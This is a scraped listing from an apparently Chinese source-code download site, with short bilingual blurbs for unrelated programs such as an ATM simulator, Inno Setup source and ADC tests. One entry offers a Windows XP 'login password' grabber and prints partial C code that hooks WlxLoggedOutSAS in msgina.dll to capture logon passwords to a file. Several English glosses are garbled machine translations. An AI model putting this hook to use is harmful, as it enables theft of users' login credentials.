-
模拟银行提款机程序,用文件存储数据,实现存款、提款、转账等程序...
模拟银行提款机程序,用文件存储数据,实现存款、提款、转账等程序-ATMs simulation program, data file storage and achieve deposits, withdrawals, transfers and other procedures
- 2022-07-02 22:01:17下载
- 积分:1
-
把你的电话给苹果
Make your phone to Apple
- 2022-03-26 14:41:07下载
- 积分:1
-
INNO Setup5.36 source code, very good,,,
INNO Setup5.36源码,很不错的-INNO Setup5.36 source code, very good,,,
- 2022-05-14 01:48:40下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
本规范的收集通用数据访问和VB常用函数的正确性。
通用数据访问和VB常用函数的采集本代码是结合本人两年在VB程序中的经验采集而来的
- 2022-02-15 13:56:51下载
- 积分:1
-
wince5.0 battery under the upper application, testing whether the charge, showin...
wince5.0下的电池的上层应用程序,检测是否充电,弹出界面,显示电量大小,是学习ui线程的好例子-wince5.0 battery under the upper application, testing whether the charge, showing the size of electricity is a good example to learn ui thread
- 2023-03-30 02:35:04下载
- 积分:1
-
动态性能的ADC测试,包括FFT法、正弦拟合的方法、历史的方法…
ADC动态性能测试,包括FFT法,正弦拟合法,直方图法,还可以测试通道之间一致性-ADC test of dynamic performance,including FFT method,sine fit method,hist method etc.
- 2023-06-26 23:10:03下载
- 积分:1
-
Virtual virtual function usage
Virtual虚函数用法-Virtual virtual function usage
- 2022-08-25 03:38:04下载
- 积分:1
-
C#,刷新数据库;
C#,刷新数据库;-C#, updated database;
- 2023-01-31 07:25:03下载
- 积分:1
-
文件读写程序,很不错的!
文件读写程序,很不错的!-document literacy procedures, very good!
- 2023-02-28 22:20:03下载
- 积分:1